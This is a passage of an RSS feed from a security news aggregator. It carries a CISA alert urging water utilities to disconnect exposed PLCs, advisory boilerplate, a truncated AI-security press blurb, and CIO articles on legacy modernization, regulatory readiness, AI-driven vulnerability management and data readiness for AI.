<h2>Terms of Use</h2>
<p>The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of Siemens ProductCERT SSA-019113 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-07-14</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-07-14</td>
<td>1</td>
<td>Publication Date</td>
</tr>
<tr>
<td>2026-07-28</td>
<td>2</td>
<td>Initial CISA Republication of Siemens ProductCERT SSA-019113 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Urges Water and Wastewater Systems Sector to Protect OT Against Activity Targeting PLCs]]></title>
<description><![CDATA[CISA is currently observing a significant increase in cyber threat actors targeting programmable logic controllers (PLCs) in the Water and Wastewater Systems (WWS) Sector. CISA urges critical infrastructure owners, operators, and integrators to remove publicly exposed PLCs and other operational t...]]></description>
<link>https://tsecurity.de/de/3697597/it-security-nachrichten/cisa-urges-water-and-wastewater-systems-sector-to-protect-ot-against-activity-targeting-plcs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697597/it-security-nachrichten/cisa-urges-water-and-wastewater-systems-sector-to-protect-ot-against-activity-targeting-plcs/</guid>
<pubDate>Mon, 03 Aug 2026 00:06:07 +0200</pubDate>
<content:encoded><![CDATA[<p>CISA is currently observing a significant increase in cyber threat actors targeting programmable logic controllers (PLCs) in the Water and Wastewater Systems (WWS) Sector. CISA urges critical infrastructure owners, operators, and integrators to remove publicly exposed PLCs and other operational technology (OT) from the internet as soon as possible. Threat actors targeting exposed PLCs have modified passwords to lock out operators and disconnected the PLCs by changing their IP addresses. This activity has resulted in boil water notices and sustained manual operations. </p>
<p>These threat actors are targeting water entities of all sizes. Even water organizations with mature cybersecurity processes should validate their external connections, as this targeting activity includes cellular modems installed by operators, vendors, or system integrators that may not be documented or included in routine attack surface scans. OT assets exposed to the internet have an increased risk of defacement, configuration changes, operational disruptions, and, in severe cases, physical damage.</p>
<p>CISA recommends organizations implement the following mitigations:</p>
<ul type="disc">
<li>Disconnect the PLC from the internet. Remote access for operational purposes should go through a VPN or gateway device, not directly to the PLC.</li>
<li>Enable password protection and change default passwords.</li>
<li>Allowlist IPs to only allow remote access from known engineering laptops or other critical OT assets.</li>
</ul>
<p>After disconnecting PLCs from the internet, operators should ensure they have a known clean backup of the PLC image in case they are locked out by a modified password. <strong>Note: </strong>Owners, operators, and integrators of Rockwell Automation MicroLogix 1400 PLCs should see Rockwell Automation’s <a href="https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1790.html" target="_blank">IMPORTANT NOTICE: Restoring Access to a MicroLogix™ 1400 Controller When the Password Is Unknown</a> for guidance addressing this activity.</p>
<p>To securely enable remote access to your OT systems, CISA recommends system owners, operators, and integrators see the following resources for guidance: </p>
<ul type="disc">
<li>CISA: <a href="https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology">Primary Mitigations to Reduce Cyber Threats to Operational Technology</a></li>
<li>United Kingdom's National Cyber Security Center: <a href="https://www.ncsc.gov.uk/collection/operational-technology/secure-connectivity" target="_blank">Secure Connectivity Principles for Operational Technology</a> </li>
<li>Federal Bureau of Investigation (FBI): <a href="https://www.ic3.gov/PSA/2026/PSA260730.pdf" target="_blank">Malicious Cyber Actors Targeting Water and Wastewater Sector Internet Facing Programmable Logic Controllers, Causing Operational Disruptions</a></li>
</ul>
<p>For additional support, contact the Environmental Protection Agency’s <a href="https://www.epa.gov/cyberwater/forms/cybersecurity-technical-assistance-program-water-sector" target="_blank">Cybersecurity Technical Assistance Program for the Water Sector</a> or your <a href="https://www.cisa.gov/about/regions">CISA Regional Office</a>.</p>
<p>To report a cyber incident, contact CISA’s 24/7 Operations Center (<a href="mailto:contact@cisa.dhs.gov" target="_blank">contact@cisa.dhs.gov</a>), or call 1-844-Say-CISA (1-844-729-2472). Please see <a href="https://www.cisa.gov/reporting-cyber-incident">Reporting a Cyber Incident</a> for more details or contact <a href="https://www.ic3.gov/" target="_blank">FBI’s Internet Crime Complaint Center (IC3)</a> or your <a href="https://www.fbi.gov/contact-us/field-offices" target="_blank">local FBI field office</a>.</p>
<p>When available, please include the following information regarding the incident: </p>
<ul type="disc">
<li>Date, time, and location of the incident</li>
<li>Type of activity</li>
<li>Number of people affected</li>
<li>Type of equipment used for the activity</li>
<li>Name of the submitting company or organization, and a designated point of contact</li>
</ul>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA. </p>
<h2><strong>Acknowledgements</strong></h2>
<p>The Environmental Protection Agency and the Federal Bureau of Investigation contributed to this Alert.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[News alert: OpenMatter proposes verification architecture for securing autonomous AI systems]]></title>
<description><![CDATA[MELBOURNE, Fla., July 30, 2026, CyberNewswire – The growing number of high-profile AI security incidents making headlines around the world are not simply cybersecurity failures. They are architectural failures, according to OpenMatter Network Co-Founder and CEO Renee Davis.
“Recent incidents … (m...]]></description>
<link>https://tsecurity.de/de/3697551/it-security-nachrichten/news-alert-openmatter-proposes-verification-architecture-for-securing-autonomous-ai-systems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697551/it-security-nachrichten/news-alert-openmatter-proposes-verification-architecture-for-securing-autonomous-ai-systems/</guid>
<pubDate>Mon, 03 Aug 2026 00:04:47 +0200</pubDate>
<content:encoded><![CDATA[<p>MELBOURNE, Fla., July 30, 2026, CyberNewswire<strong> – </strong>The growing number of high-profile AI security incidents making headlines around the world are not simply cybersecurity failures. They are architectural failures, according to OpenMatter Network Co-Founder and CEO Renee Davis.</p>
<p><a href="https://www.lastwatchdog.com/wp/wp-content/uploads/Untitled_design_1_1785345577GFlH2l3KbJ.jpg" rel="nofollow"><img decoding="async" class="alignright size-medium wp-image-39807" src="https://www.lastwatchdog.com/wp/wp-content/uploads/Untitled_design_1_1785345577GFlH2l3KbJ-520x275.jpg" alt="" width="520" height="275" srcset="https://www.lastwatchdog.com/wp/wp-content/uploads/Untitled_design_1_1785345577GFlH2l3KbJ-520x275.jpg 520w, https://www.lastwatchdog.com/wp/wp-content/uploads/Untitled_design_1_1785345577GFlH2l3KbJ-960x509.jpg 960w, https://www.lastwatchdog.com/wp/wp-content/uploads/Untitled_design_1_1785345577GFlH2l3KbJ-100x53.jpg 100w, https://www.lastwatchdog.com/wp/wp-content/uploads/Untitled_design_1_1785345577GFlH2l3KbJ-768x407.jpg 768w, https://www.lastwatchdog.com/wp/wp-content/uploads/Untitled_design_1_1785345577GFlH2l3KbJ-1536x814.jpg 1536w, https://www.lastwatchdog.com/wp/wp-content/uploads/Untitled_design_1_1785345577GFlH2l3KbJ.jpg 1920w" sizes="(max-width: 520px) 100vw, 520px"></a>“Recent incidents … <a href="https://www.lastwatchdog.com/news-alert-openmatter-proposes-verification-architecture-for-securing-autonomous-ai-systems/" class="read-more">(more…) </a></p>
<p>The post <a href="https://www.lastwatchdog.com/news-alert-openmatter-proposes-verification-architecture-for-securing-autonomous-ai-systems/">News alert: OpenMatter proposes verification architecture for securing autonomous AI systems</a> first appeared on <a href="https://www.lastwatchdog.com/">The Last Watchdog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Legacy Software Modernization: A Business and Security Strategy]]></title>
<description><![CDATA[Replacing old code isn't just a chore for developers. Choosing legacy software modernisation services directly impacts your growth, security, and customer trust. An experiencedlegacy software modernization firm helps rebuild core architecture so you can innovate instead of constantly patching hol...]]></description>
<link>https://tsecurity.de/de/3697530/it-security-nachrichten/legacy-software-modernization-a-business-and-security-strategy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697530/it-security-nachrichten/legacy-software-modernization-a-business-and-security-strategy/</guid>
<pubDate>Mon, 03 Aug 2026 00:04:22 +0200</pubDate>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://www.cm-alliance.com/cybersecurity-blog/legacy-software-modernisation-a-business-and-security-strategy" title="" class="hs-featured-image-link"> <img src="https://www.cm-alliance.com/hubfs/Modernizing_Legacy_Software_with_bgc.webp" alt="Legacy Software Modernization" class="hs-featured-image"> </a> 
</div> 
<p>Replacing old code isn't just a chore for developers. Choosing legacy software modernisation services directly impacts your growth, security, and customer trust. An experienced<a href="https://chisw.com/expertise/legacy-modernization/">legacy software modernization firm</a> helps rebuild core architecture so you can innovate instead of constantly patching holes. Executive leadership must treat core system updates as strategic commercial investments in business and security, not simple maintenance expenses. <br></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The blueprint for innovation: 3 ways regulatory readiness is a competitive advantage]]></title>
<description><![CDATA[Too often, brands treat compliance as a downstream exercise. Teams build products, launch new capabilities and then tack on controls afterward.



The pace of technology evolution and adoption has never been faster, and regulatory bodies are doing their best to keep up. For brands, that means the...]]></description>
<link>https://tsecurity.de/de/3697423/it-security-nachrichten/the-blueprint-for-innovation-3-ways-regulatory-readiness-is-a-competitive-advantage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697423/it-security-nachrichten/the-blueprint-for-innovation-3-ways-regulatory-readiness-is-a-competitive-advantage/</guid>
<pubDate>Mon, 03 Aug 2026 00:03:34 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph">Too often, brands treat compliance as a downstream exercise. Teams build products, launch new capabilities and then tack on controls afterward.</p>



<p class="wp-block-paragraph"><a></a>The pace of technology evolution and adoption has <a href="https://hai.stanford.edu/ai-index/2026-ai-index-report">never been faster</a>, and regulatory bodies are doing their best to keep up. For brands, that means they’re standing on shifting ground. They need  to modernize legacy infrastructure, adopt AI responsibly, deliver better customer experiences, maintain trust and navigate increasingly complex regulatory requirements – all at once.</p>



<p class="wp-block-paragraph"><a></a>I’ve witnessed this shift firsthand in payments. Fraudsters adapt faster than regulatory cycles, and customer expectations continue to rise regardless of where legislation stands. In one of the most highly regulated sectors, waiting for new mandates to arrive is a losing strategy.</p>



<p class="wp-block-paragraph"><a></a>The brands that lead have embraced regulatory readiness as an advantage to better inform technology architecture, operating models and partner strategy.</p>



<p class="wp-block-paragraph"><a></a>If I had one piece of advice for CIOs, it would be to treat compliance as part of the blueprint instead of the punch list at the end of a build. With a controls-by-design approach, a collaborative culture, and the right partnerships, any brand can embrace change with confidence and resilience.</p>



<h2 class="wp-block-heading">3 ways regulatory readiness is a competitive advantage</h2>



<h3 class="wp-block-heading">1. Build a solid foundation</h3>



<p class="wp-block-paragraph">One of the most impactful strategies I’ve seen is the shift from compliance-after-the-fact to controls-by-design.</p>



<p class="wp-block-paragraph">Forward-thinking financial institutions increasingly treat regulatory frameworks like <a href="https://kpmg.com/be/en/insights/risk/digital-operational-resilience-act-DORA/prepare-for-dora-today-and-secure-your-digital-operational-resilience-tomorrow.html">DORA</a> and <a href="https://www.ey.com/en_ch/insights/forensic-integrity-services/the-eu-ai-act-what-it-means-for-your-business">the EU AI Act</a> as design principles rather than external requirements. Instead of asking how to retrofit compliance into modern systems, they are asking how thoughtful governance can shape modernization from day one.</p>



<p class="wp-block-paragraph">For example, the EU AI Act mandates transparency for high-risk AI systems like automated credit scoring. Instead of burying disclosures in the fine print, a smart bank builds an interactive feature directly into its digital banking app, which allows customers to simulate how adjustments will improve their approval odds. By doing so, they transform a regulatory obligation into innovation that builds trust.</p>



<p class="wp-block-paragraph">After all, when an AI-driven decision fails, customers do not blame the algorithm. They blame the brand. The controls-by-design approach helps ensure those risks are anticipated and managed before they reach the customer.</p>



<p class="wp-block-paragraph">This feels particularly urgent in the payments industry, where FedNow and stablecoins allow funds to move instantly – and irrevocably. As settlement windows shrink from days to seconds, brands need to embed capabilities like behavioral monitoring, AI-driven fraud detection, account verification and orchestration functionality directly into the transaction architecture itself – as part of the initial design – to identify and mitigate fraudulent activity as it evolves. Regulation, like <a href="https://www.paymentsdive.com/news/nachas-fraud-rules-land/823378/">Nacha’s new rules</a> around ACH fraud, reinforces that direction, but for trust-focused brands, the work begins long before the rules change.</p>



<p class="wp-block-paragraph">Each of these examples points to the same trend. Brands that embrace a controls-by-design philosophy are constructing technology architectures that are ready to adapt long before the inspectors arrive on site.</p>



<h3 class="wp-block-heading">2. Align your crew</h3>



<p class="wp-block-paragraph">Technology architecture is only half of the story. The other half is how well your crew works together to bring that architecture to life.</p>



<p class="wp-block-paragraph">For years, compliance lived in its own lane. Governance acted like a checkpoint. When technology evolved in predictable cycles, that made sense. But today, the brands making the greatest progress build shared accountability into their operating models so they can adapt to regulation in a more coordinated, consistent way.</p>



<p class="wp-block-paragraph">After all, a construction project is only successful when electricians, plumbers, framers and masons coordinate every step and trust the work happening around them.</p>



<p class="wp-block-paragraph">The same is true in the enterprise. Instead of focusing on separate priorities, product, engineering, operations, risk and compliance must align around shared outcomes, with greater transparency into how decisions are made, ongoing oversight and continuous feedback loops between teams. As a result, regulatory readiness becomes part of how the business works every day, change becomes easier and the broader benefits across the organization become clear.</p>



<p class="wp-block-paragraph">In many organizations, I’ve observed how harmony between teams not only increases compliance but also fosters greater <a href="https://www.cio.com/article/4129625/3-myths-to-debunk-in-customer-centric-innovation.html">customer-centric innovation</a>. When teams operate from a shared, real-time view of the customer, every interaction becomes more connected. Customers experience one brand, not a collection of disconnected teams.</p>



<p class="wp-block-paragraph">That spirit of collaboration becomes even more important as AI moves deeper into customer-facing and operational workflows. <a href="https://www.techradar.com/pro/how-ai-innovation-is-outpacing-regulation">AI innovation has outpaced AI regulation</a>, which makes it even more important for brands to take the initiative to ensure proper controls are in place.</p>



<p class="wp-block-paragraph">We are already seeing this play out with <a href="https://www.federalreserve.gov/supervisionreg/srletters/SR2602.htm">SR 26-2</a>, the Federal Reserve’s latest guidance on AI for banks. While it establishes important expectations around model risk management, it leaves room for institutions to determine how agentic AI and generative AI should be governed. Instead of treating this as carte blanche, banking leaders should see this as an opportunity to build trust. By leading the way with governed, responsible GenAI and agentic AI operating models, banks can win customers’ trust long before regulation requires it.</p>



<p class="wp-block-paragraph">No single department should shoulder that responsibility alone. Product teams understand how AI shapes the customer experience. Engineering teams understand how models are built, deployed and monitored. Risk and compliance teams understand governance expectations, while operations teams see how those decisions play out every day. Effective AI governance and innovation emerge when those perspectives come together around a shared view of accountability.</p>



<h3 class="wp-block-heading">3. Expand your toolkit</h3>



<p class="wp-block-paragraph">Innovation in today’s regulatory environment requires more tools than you may have in your own toolkit.</p>



<p class="wp-block-paragraph">Technology is more complex, fraud threats evolve faster and AI capabilities require significant investment and ongoing tuning. At the same time, brands have to stay ahead of customer expectations, market dynamics and evolving risk requirements.</p>



<p class="wp-block-paragraph">It just doesn’t make sense to build every capability yourself when trust, resilience, compliance and speed-to-value are such integral parts of the equation. </p>



<p class="wp-block-paragraph">Throughout my career, I’ve seen success with a build-buy-partner approach that brings together the right tools for the right project.</p>



<p class="wp-block-paragraph">This is particularly important in highly regulated environments, where implementation risk can be as significant as technical risk. That’s where proven results – especially through partnership – might take precedence over experimentation.</p>



<p class="wp-block-paragraph">I went through this consideration just recently. CSG Forte partnered with IBM to launch PaymentsProtection.ai.</p>



<p class="wp-block-paragraph">We set out to provide customers with AI-powered fraud detection and financial risk management without spending years recreating capabilities that already existed. By partnering with IBM, we were able to access additional specialty tools: AI capabilities, real-time monitoring, financial risk management expertise and external validation in one of the most sensitive areas of payments. The collaboration reduced fraud losses by 50-70%, lowered false positives and offered customers a smoother, safer experience.</p>



<p class="wp-block-paragraph">In a market that never stands still, the right tools give brands the freedom to build with greater precision, adaptability and purpose.</p>



<h2 class="wp-block-heading">Raise the standard</h2>



<p class="wp-block-paragraph">Successful brands are changing how they think about regulation. Instead of looking at it as a burden or a constraint on innovation, they are treating it like a key factor in architectural decisions, crew alignment and partner strategy.</p>



<p class="wp-block-paragraph">That approach increasingly separates the brands raising the standard from those struggling to keep up. It changes the role regulation plays within the business. It infuses trust, governance and adaptability into a brand’s foundation.</p>



<p class="wp-block-paragraph">Those capabilities make it easier to scale new builds, navigate future change and innovate with confidence as markets, customer expectations and regulatory requirements continue to charge ahead.</p>



<p class="wp-block-paragraph">The brands shaping the future won’t be scrambling to reinforce the structure after the cracks appear. They’ll be the ones that construct resilience from the very beginning.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI helps the US Senate Federal Credit Union better manage risk]]></title>
<description><![CDATA[The United States Senate Federal Credit Union (USSFCU) is a nonprofit financial cooperative that provides traditional retail banking services to entities within the US government, such as the Senate and the Supreme Court.At present, the credit union’s headcount stands at nearly 150 people, managi...]]></description>
<link>https://tsecurity.de/de/3697425/it-security-nachrichten/how-ai-helps-the-us-senate-federal-credit-union-better-manage-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697425/it-security-nachrichten/how-ai-helps-the-us-senate-federal-credit-union-better-manage-risk/</guid>
<pubDate>Mon, 03 Aug 2026 00:03:34 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The United States Senate Federal Credit Union (USSFCU) is a nonprofit financial cooperative that provides traditional retail banking services to entities within the US government, such as the Senate and the Supreme Court.At present, the credit union’s headcount stands at nearly 150 people, managing around $1.6 billion in assets.</p>



<p class="wp-block-paragraph">A few years back, when it started to expand its use of technology, cybersecurity was a key focus area, but the financial institution faced two major challenges in boosting security as it scaled. The USSFCU was carrying significant technical debt, and there were holes in the organization’s defenses.</p>



<p class="wp-block-paragraph">“We found gaps where we needed more systems, tools, and people, and then there were instances where we had technologies in place that weren’t being used effectively,” says Mark Fournier, CIO at the credit union. “We weren’t buying a bunch of shiny new things without thinking about it. We were actually quite prescriptive every year, performing a number of different exercises to identify our shortcomings and then finding the right solution to fill the gaps. But over time this adds up. It was clear we couldn’t keep hiring more people and bringing in new solutions.”</p>



<p class="wp-block-paragraph">The USSFCU needed a more efficient way to bring everything together and make its cyber estate easier to manage. For Fournier and his team, vulnerability management was the hardest hill to climb since they have to deal with about 100 new possible breach points every day.</p>



<p class="wp-block-paragraph">“When we looked at the problem more closely, the impact of these vulnerabilities was far greater than we realized,” he says. “Not only because of the volume but because of a lack of clear understanding around the potential impact of each one across the broader business.”</p>



<h2 class="wp-block-heading">Improved risk management</h2>



<p class="wp-block-paragraph">The USSFCU didn’t lack security tools, however. In fact, it had plenty, from scanners and endpoint tools to asset records, tickets, and internal documentation. But each tool saw only a slice of the environment, so there was little to no context. This made it difficult for the security team to separate real business risk from noise.</p>



<p class="wp-block-paragraph">So for each new vulnerability, the security team had to run a manual investigation, which could take days. And while doing this, they still had to triage the next wave of findings. The organization, therefore, needed a way to know what mattered, why it mattered, who owned it, and whether taking the time to make a fix actually reduced risk. The USSFCU also required a solution to be deployed entirely in-house, leveraging its internal inferences.</p>



<p class="wp-block-paragraph">Working with Tonic Security, the organization deployed an exposure management solution that pulls together data from different tools and data sources to create a clear picture of business risk. “One of the key functions of the platform is the ability to ingest anything,” says Fournier. “Breaking down silos between disparate systems is essential to unlock valuable contextual information.”</p>



<p class="wp-block-paragraph">For the USSFCU, transparency and explainability are critical, he adds. This tool uses an AI data fabric to extract context from structured and unstructured data. This context drives prioritization, ensuring the right owner gets the right evidence, not a vague ticket. And once the work is done, the solution checks whether the exposure was reduced.</p>



<p class="wp-block-paragraph">Because the AI is grounded in the customer’s own environment, it isn’t just guessing from a generic risk model. It reasons over USSFCU’s assets, owners, services, tickets, controls, and business context. But it isn’t using this data to train external models.</p>



<p class="wp-block-paragraph">Describing one particular incident, Fournier explains that shortly after the initial deployment, various stakeholders met to assess progress. “We thought we were smart because we found an error with the platform,” he says. “The solution had labelled an asset as internet exposed, which we knew was incorrect.” But after a review and lengthy discussion, they were proven wrong. “Almost immediately, the value of bringing this information together became apparent.”</p>



<h2 class="wp-block-heading">A template for bigger things</h2>



<p class="wp-block-paragraph">Before this solution, a high-severity finding could send an analyst on a lengthy scavenger hunt because of data located in so many different places. They’d check the scanner, asset inventory, tickets, and maybe even ask around to find the owner. But now they can find the asset, the owner, the business relevance, the exposure path, and the recommended action in one place. The solution has reduced the time taken to resolve a vulnerability by 75%. And with a clearer idea of what is and isn’t important, and what adds practical value, the number of incidents someone needs to respond to has reduced from about 100 a month to just 10.</p>



<p class="wp-block-paragraph">Sharing his lessons from the project, Fournier says one needs to keep an open mind because the problem you think you have is often very different from the one you actually have. “This project has also been an eye-opener around how people can collaborate and operate across different areas of the business,” he says. “When I talk to my peers, they regularly highlight the disconnect between different departments and business functions. But with a project like this, when you’re crossing traditional boundaries, you need to have open lines of communication to succeed.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your AI model isn’t the problem. Your data was never ready for it]]></title>
<description><![CDATA[The meeting that changed my perspective



I remember sitting there and realizing I wasn’t thinking about the model at all. I was thinking about the data feeding it.



One discussion stands out in particular. We were evaluating how predictive analytics could improve sales forecasting for a natio...]]></description>
<link>https://tsecurity.de/de/3697426/it-security-nachrichten/your-ai-model-isnt-the-problem-your-data-was-never-ready-for-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697426/it-security-nachrichten/your-ai-model-isnt-the-problem-your-data-was-never-ready-for-it/</guid>
<pubDate>Mon, 03 Aug 2026 00:03:34 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">The meeting that changed my perspective</h2>



<p class="wp-block-paragraph">I remember sitting there and realizing I wasn’t thinking about the model at all. I was thinking about the data feeding it.</p>



<p class="wp-block-paragraph">One discussion stands out in particular. We were evaluating how predictive analytics could improve sales forecasting for a national portfolio of opportunities. Leadership wanted greater confidence in projected outcomes so resources could be prioritized earlier in the sales cycle. As conversations turned toward model accuracy, we discovered something more important. Different teams weren’t consistently recording opportunity stages, probability scores and client attributes. The model wasn’t struggling because it lacked sophistication. It was learning from business processes that had never been standardized in the first place. That meeting changed how I approached every AI initiative that followed.</p>



<p class="wp-block-paragraph">Throughout my career leading enterprise business intelligence initiatives, I’ve repeatedly watched organizations blame the algorithm when the real issue was inconsistent data, fragmented ownership across departments and business definitions that meant different things to different teams. AI doesn’t distinguish between disciplined and inconsistent business processes. It learns from both with equal confidence.</p>



<p class="wp-block-paragraph">I’d built and defended executive dashboards for years before that meeting, and dashboards had trained me to believe imperfect data was a manageable, even routine problem. Experienced leaders read a dashboard with context. They know which numbers to trust, which ones need a caveat and which gaps to mentally fill in based on what they already know about the business. Predictive AI doesn’t have that judgment. Machine learning assumes the historical data it’s trained on represents reality as it actually is. If two departments define “active customer” differently, or if a critical field has been silently incomplete for two fiscal years, the model doesn’t notice or compensate. It learns the inconsistency as ground truth, and it repeats that mistake at scale, with confidence, every single time it runs.</p>



<p class="wp-block-paragraph">That moment fundamentally changed how I approach every AI initiative. I stopped starting with technology and started with data integrity instead.</p>



<h2 class="wp-block-heading">5 questions I ask before any AI platform conversation</h2>



<p class="wp-block-paragraph">Today, I rarely begin AI discussions by talking about technology. Before any conversation about platforms or vendors, I ask five questions of the leadership team. Can we explain, in plain language, where this data actually comes from? Do the business leaders in the room agree on what our core definitions mean, or does “revenue” or “active account” shift depending on who’s presenting? Would we rely on this data to make a multimillion-dollar decision without a human manually double-checking it first? Is there a specific, named person accountable for every critical dataset, or does ownership dissolve the moment something goes wrong? And underneath all of it, are we actually solving a business problem, or are we chasing a technology because it’s the thing everyone else is talking about this quarter?</p>



<p class="wp-block-paragraph">I remember one initiative where these questions prevented us from moving too quickly. During an early assessment, we discovered that two operational systems treated the same customer differently because each had evolved around separate business processes. Executive reports appeared consistent because manual reconciliation had become part of the monthly reporting routine. Once we identified the inconsistency, the project paused while business stakeholders agreed on common definitions and ownership. That decision delayed the AI initiative by only a few weeks, but it likely prevented months of troubleshooting after deployment. More importantly, it strengthened confidence in every analytics initiative that followed.</p>



<p class="wp-block-paragraph">These conversations reveal far more about whether an organization is genuinely ready for AI than any vendor demonstration ever will. A polished proof-of-concept can make almost any dataset look production-ready for the ten minutes it’s on screen. These five questions don’t have that luxury. They tend to surface, quickly and uncomfortably, where an organization’s data confidence actually breaks down, and that’s the information leadership needs before committing budget and reputation to a rollout.</p>



<p class="wp-block-paragraph">This lines up with what the <a href="https://www.nist.gov/itl/ai-risk-management-framework">NIST AI Risk Management Framework</a> has argued for a while now: governance and accountability belong at the foundation of an AI initiative, not layered in after a model is already in production. Governance built in retroactively tends to be theater, built to explain a failure that’s already happened rather than to prevent one.</p>



<h2 class="wp-block-heading">Leadership before technology</h2>



<p class="wp-block-paragraph">The organizations I’ve seen actually succeed with AI invest first in governance, ownership and shared business definitions, and only then in the platform itself. They clean up master data before they scale a model against it. They remove duplication in customer and product records. They assign accountability for datasets the same way they’d assign accountability for a budget line, with a name attached and consequences if it slips. This work rarely shows up in a demo, which is probably why it gets skipped so often in the rush toward deployment.</p>



<p class="wp-block-paragraph">One lesson I’ve seen repeatedly is that assigning ownership changes behavior almost immediately. Once business leaders understood they were accountable for the quality of specific datasets, not just the reports generated from them, conversations shifted. Instead of asking why dashboards looked different, teams began discussing why the underlying business process produced inconsistent information. Governance stopped being viewed as documentation and became part of everyday decision-making. The improvements weren’t dramatic overnight, but they were sustainable, and that consistency ultimately mattered more than any individual technology upgrade.</p>



<p class="wp-block-paragraph">I saw this firsthand during an executive reporting initiative where multiple leadership teams relied on the same performance dashboard but interpreted one KPI differently, because ownership had never been clearly assigned. Once the business designated a single owner for the metric and standardized its definition across reporting systems, disagreements disappeared almost overnight. More importantly, that same governance work later allowed predictive analytics to be introduced with confidence, because everyone was working from the same version of the truth.</p>



<p class="wp-block-paragraph">I’ve learned that AI projects rarely fail in the data science team. They fail months earlier, when leadership assumes the organization already understands its own data.</p>



<p class="wp-block-paragraph"><a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai">McKinsey’s research on scaling AI</a> reinforces this pattern at scale: the organizations that generate lasting value from AI are consistently the ones that pair the technology with real changes to their operating model and governance, rather than simply layering AI on top of how things already worked. That finding matches what I’ve observed leading enterprise analytics initiatives directly. The technology was rarely the constraint. The organization’s relationship with its own data was.</p>



<p class="wp-block-paragraph">It’s tempting to frame AI adoption as an engineering problem with a leadership footnote, when in practice it’s closer to the reverse. CIOs reporting on rebuilding an AI-ready data strategy make a related point: treating data ownership as a purely IT issue stops working once business units, product teams and AI platforms are all generating and transforming data continuously, which is exactly why accountability has to sit with named business leaders, not a technical team working in isolation. <a href="https://www.cio.com/article/4049233/5-actions-to-build-an-ai-ready-data-culture.html">A related piece on building an AI-ready data culture</a> puts it more bluntly: an organization can’t scale AI without first scaling trust in its own data, and that trust starts with culture and ownership, not tooling.</p>



